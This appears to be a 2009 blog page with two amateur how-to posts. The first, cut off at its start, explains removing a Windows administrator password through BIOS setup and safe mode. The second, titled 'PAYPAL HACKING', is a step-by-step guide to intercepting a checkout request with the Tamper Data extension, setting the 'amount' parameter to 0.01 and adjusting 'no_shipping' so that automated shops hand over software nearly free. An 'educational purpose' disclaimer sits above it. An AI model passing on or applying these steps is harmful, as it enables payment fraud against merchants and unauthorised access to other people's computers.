    when your starting up the computer, press F11, delete, or whatever the computers bios says to do to enter setup.

    StartupScreen.gif

    StartupScreen.gif


    step 2disable password!

    once the computer is booted up in safe mode, go to -start -controlpannel -user accounts then select the administrator account, (it will say which one it is) and you should see a button to disable password, or create new password.

    when thats done, shut the computer down, and use the same method to set the computer back to normal mode, and when you boot it up you will have either a new password you chose, or no password at all!!



    Jul 4, 2009

    PAYPAL HACKING


    introPaypal hacking

    This tutorial is completly for educational purpose and i am not responsible for any of the cases related to it.
    I strongly recommend to obey the rules which are essential for the welfare of us......


    This tutorial will help you to hopefully get software and possibly products for almost free.
    It won't work on products because it sends the seller an email along the lines of "you have received $0.01 from (your paypal name) for (the product)" However this works great on automated software scripts where it detects that you gave a payment and emails you a link to download the software.

    IT'S BACK FROM THE GRAVE, REPUBLISHED!








    step 1Download Tamper Data

    You will need the Firefox extension Tamper Data for this to work.
    Download it here:
    link to download tamper data







    step 2Finding your target

    You need to find a place that supports paypal or paypal shopping carts.




    intro.png

    step 3Start Tamper Data

    Next we need to start Tamper Data up.
    In Firefox menu go to tools then Tamper Data.
    Once the window shown below pops up press Start Tamper








    step 4Buy it!!

    Now click add to cart.
    The Tamper with request window will pop up. Click the Tamper button.




    intro.pngtamper.jpg


    step 5Tamper with the data

    Now for the most important part, modifying the post variables.
    Find the parameter called amount and change the value to 0.01 because that is the lowest amount PayPal will process. Next mess with the parameter called no_shipping, if it is even there, until your shipping comes out free. When you are done click the OK button at the bottom of the window.






    data.jpgok.jpg


    step 6Finished

    Your now done and the world is your oyster (or other preferred mollusk)!




    done.png




    Abel The Legend